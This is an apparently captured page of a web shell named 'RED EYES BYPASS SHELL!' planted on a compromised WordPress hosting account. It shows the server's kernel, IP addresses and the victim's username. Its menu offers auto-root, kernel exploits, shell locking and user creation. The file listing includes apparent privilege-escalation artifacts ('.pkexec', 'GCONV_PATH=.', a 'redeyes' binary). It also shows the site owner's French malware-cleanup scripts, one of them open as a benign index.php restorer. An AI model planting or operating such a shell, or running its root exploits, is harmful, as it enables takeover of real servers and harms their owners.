Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
dr-xr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwx---r-x
.bash_history
17.05
KB
-rw-------
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
35
B
-rw-------
.htaccess
221
B
-rw----r--
.ovhconfig
105
B
-rw----r--
.ovhconfig.backup-20260114-145705
106
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
.viminfo
5.85
KB
-rw-------
.wget-hsts
168
B
-rw-r--r--
6digits.sh
1.44
KB
-rwx--xr-x
diagnostic-serveur.sh
9.44
KB
-rwxr-xr-x
fichiers_modifies.csv
11.33
KB
-rw-r--r--
nettoyage-backdoors-supplementaires.sh
2.38
KB
-rwxr-xr-x
nettoyage-index.php.sh
1.07
KB
-rwxr-xr-x
plan-mises-a-jour.sh
2.22
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
scan-complet.sh
10.77
KB
-rwxr-xr-x
verification-mises-a-jour.sh
5.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nettoyage-index.php.sh
#!/bin/bash # # Script de nettoyage de index.php # Supprime le code malveillant et restaure le fichier propre # set -e WP_ROOT="/home/eglisebaa/www" INDEX_FILE="$WP_ROOT/index.php" BACKUP_FILE="$WP_ROOT/index.php.backup-$(date +%Y%m%d-%H%M%S)" echo "🔧 Nettoyage de index.php..." # Vérifier que le fichier existe if [ ! -f "$INDEX_FILE" ]; then echo "❌ Erreur: index.php non trouvé" exit 1 fi # Créer une sauvegarde echo "📦 Création d'une sauvegarde: $BACKUP_FILE" cp "$INDEX_FILE" "$BACKUP_FILE" # Créer le fichier index.php propre cat > "$INDEX_FILE" << 'EOFPHP' <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php'; EOFPHP echo "✅ index.php nettoyé avec succès" echo "📋 Sauvegarde créée: $BACKUP_FILE"
Close